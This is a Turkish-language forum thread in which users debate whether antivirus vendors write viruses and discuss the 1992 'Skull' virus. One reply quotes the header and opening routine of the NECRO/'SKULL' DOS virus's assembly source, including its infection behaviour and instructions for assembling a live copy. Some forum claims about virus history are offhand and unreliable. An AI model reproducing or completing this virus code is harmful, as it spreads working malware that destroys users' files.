Jump to content
Forumu Destekleyenlere Katılın ×
Paticik Forumları
2000 lerden beri faal olan, çok şukela bir paylaşım platformuyuz. Hoşgeldiniz.

Virüs ve Anti-Virüs


Masteis

Öne çıkan mesajlar

sınıfta baya tartışmıştık tabi akıllarda soru işaretleri bırakıyor.

Bildiğiniz gibi virüsler gün geçtikçe yenileniyor faka aynı zamanlamada anti virüsler bile yenileniyor hatta ve hatta çıkacak olan virüsler için bile*(Daha çıkmamış olan) fixleyebilen anti-virüsler çıkarıyorlar. Şimdi sorular;

1- Anti-Virüs üreticileri para kazanmak için virüs yazıp yayınlayıp sonrada anti virüs diye kakalıyorlarmıdır?

2- Peki öyle değilsede çıkmamış olan virüsü nasıl tahmin ediyorlar?

3- Virüsler bildiğiniz gibi aslında giripte bilgisayara zarar vermez, ama şöyle zarar verir;
Dosyalarınıza girer ve scriptlerini(valueler vs.) değiştirir buda çalışmamalarına yol açar bilgisayarı yazılımsal olarak iflak eder. Peki bu yazılımları anti-virüsler nerden anlıyor?

4- Donanıma ilk hasar veren 1992 yılında çıkan virüs skull virüsüdür. Ve virüsün kodları yayınlandı hatta fixlendi fakat söylentilere göre kodları değiştirip yayınlanabilir fakat neden yapılmadı?

-----------
Evet ?[signature][hline]30 saniyenizi ayırarak şu linke tıklayıp sadece mail gönderiniz ve telekoma karşı olan protestoda yardımda bulunun.
Sadece 30 saniye
Link to comment
Sosyal ağlarda paylaş

1. Bu çok bilindik bir efsane. Bana kalırsa mantıklı ama gene de büyük firmaların kendi içlerinde böyle bir birim ayırabileceklerini düşünmek çok komik.

2. Tahmin etmiyorlar. Dosya yapıları belli bir hiyerarşi ile değiştirilebilir ancak. Değiştirilebilen alanlarda güncelleme tarihini tarar anti virüsler, ona göre de bir yöntem kullanır.

3. Garip bir soru bu. Yani sen "karnın acıktığında dolapta yenebilecek şeyleri nasıl ayıklıyorsun?" ile aynı mevzu Belli bir kalıp ve yöntem var, sürekli onun üzerine gelişiyorlar. Yazılımsal şeyler hep birbirini taklit eder. Farkları dosyanın başına değil sonuna yazmasıdır mesela...

4.a. Skull değil, hiçbir virüs donanıma zarar veremez. BIOS'u tekrar yazıp 220 yerine 500v elektrik al diye ayarlasa dahi -saçmalayarak yazıyorum- bilgisayar kapanır, açtığında bios güncellersin sadece.
4.b. İlk virüs 1974 yılında "The Rabbit" adıyla çıktı.
Batch file olarak kendini klonlayan bir yazılımmış ve sistemi şişirerek dolduruyormuş.

evet?[signature][hline]
Türkiye'nin en geniş anime ve görüntü kalitesi en iyi arşivi için;
Binlerce CD ve yüzlerce DVD tutan arşiv için;

Mail: [email protected]
MSN: [email protected]

Takaslık ve satılık...

3000 oyunluk PC oyun arşivi... O da satılık ya da takaslık...
Link to comment
Sosyal ağlarda paylaş

said:
; A86 SOURCE CODE for:
;
; ++===================================================++
; || NECRO (A.K.A. 'SKULL' virus) ||
; || The 666 byte Dual Replicator ||
; || DEC 1992 by Primal Fury, Lehigh Valley, PA ||
; ++===================================================++
; -=Prepared for Crypt Newsletter 11=-
;
; Here's a virus that's actually two viruses in one. The main virus is a
; a direct action, appending .COM infector. It will search the system path
; for .COMs to infect, and may infect files on the path in preference to
; to those in the current directory (if no path is set, it stays in the
; current directory). Roughly one out of every eight infections (on a ran-
; dom basis) will be non-standard. In these infections, NECRO will toggle to
; an overwriting .EXE infector.
;
;
; This .EXE infector is composed of much of the same code as the
; COM infector -- the virus alternates between the two modes of infection
; using a 'master switch' which is hooked up to a simple randomization
; engine. The master switch, when thrown, trips a series of auxilliary
; switches which alter the virus' behavior. This saves on bytes and is
; therefore much better than having the virus drop an entirely independent
; .EXE overwriter. I hope to expand upon this 'self-programming' concept
; in future viruses.

; Infected .COM's should function as intended after the viral code appended to
; them has finished doing its thing. But infected .EXE's are ruined. These
; (provided they are under about 64K in length) will, when executed, pass
; their illness on to the next uninfected .EXE within the current directory,
; displaying the following graphic & message:

; ÜÜÛÛÛÛÛÛÛÛÜÜ
; ÜÛÛÛÛÛ²ÛÛÛÛÛÛÛÛ
;ŞÛ²ÛÛÛÛÛÛÛÛÛÛÛÛÛİ You cant execute this file:
;ŞÛÛÛÛÛ²²ÛÛÛß Û Its already dead!
; ÛÛÛÛÛÛ²²ÛÛÜÜÜÛß
; ÛÛÛÛ²²ß²ÛÛÛÛİ
; ßßÛÛ²²Ü޲ÛÛÛİ
; ²²İİİ

; SKULL will then return the baffled user to the DOS prompt. I leave it to
; your imagination to picture the consternation on the novice's face
; as he tries to isolate the source of this overwriting infection which
; seems to pop up again and again in different directories. A very
; observant user may notice a file length increase of exactly 666 bytes in
; infected .COM's. Infected .EXE's will not increase in length unless they
; are less than ~200 bytes to begin with. Note that overwritten .EXE's larger
; than 64K will fail to load and will be non-infectious. Like Popoolar
; Science, the virus renders these programs into a .COM-like in structure.
; DOS will NOT execute these files. In any case, the programs are ruined
; by SKULL. As of this release, NECRO avoids files that are read-only or
; hidden, so these files are be safe from the virus (for now...)

; CREDITS: DARK ANGEL -- for his COM infector replicatory code. (D.A.)
; NOWHERE MAN -- for his VCL 1.0's path-searching routine. (N.M.)
;
;
; Except where noted, I have commented the code with the novice
; programmer in mind. In the places so noted, D.A.'s and N.M.'s com-
; ments, supplied from VCL 1.0 and PS-MPC assembly libraries, have been
; left intact.

; To assemble, use Isaacson's A86 to generate a .COMfile directly from
; this listing. You will have a live NECRO launcher. MASM/TASM
; compatible assemblers will require the addition of a declarative pair.
;
; Partial viral signature suitable for loading into TBScan's VIRSCAN.DAT,
; SCAN, or F-PROT 2.0x:
; [Necro]
; A9 01 00 74 29 E8 6A 00 8C C8 8E D8 8E C0 32 C0


Start: db 0e9h ; jump to find_start
dw 0
Find_start: call next ;common technique to allow virus to
next: pop bp ;find its own code. On exit, bp
sub bp, offset next ;points to start of code.
lea si, [bp+offset stuff] ;Prepare to restore orig. 3 bytes.
mov di, 100h ;push 100h, where all COMs start in
push di ;memory, & where control will be
;returned to host file.
movsw ;restore the 3 bytes formerly relo-
movsb ;cated by the virus upon infection.
mov di,bp ;point DI to start of virus.
lea dx, [bp+offset dta] ;set new Disk Transfer Address, so
call set_dta ;virus won't fuck up original.
call search_files ;call path-search/infection routine.
jmp quit ;when done, return control to
;host file.
Link to comment
Sosyal ağlarda paylaş

Orada "Ben ilk virüsüm" de demiyor?
Ayrıca ilk virüsü istiyorsan "birisinin hazırladığı tek bir yazıya" değil, viruslist.com gibi sitelere bakarsın.[signature][hline]
Türkiye'nin en geniş anime ve görüntü kalitesi en iyi arşivi için;
Binlerce CD ve yüzlerce DVD tutan arşiv için;

Mail: [email protected]
MSN: [email protected]

Takaslık ve satılık...

3000 oyunluk PC oyun arşivi... O da satılık ya da takaslık...
Link to comment
Sosyal ağlarda paylaş

×
×
  • Yeni Oluştur...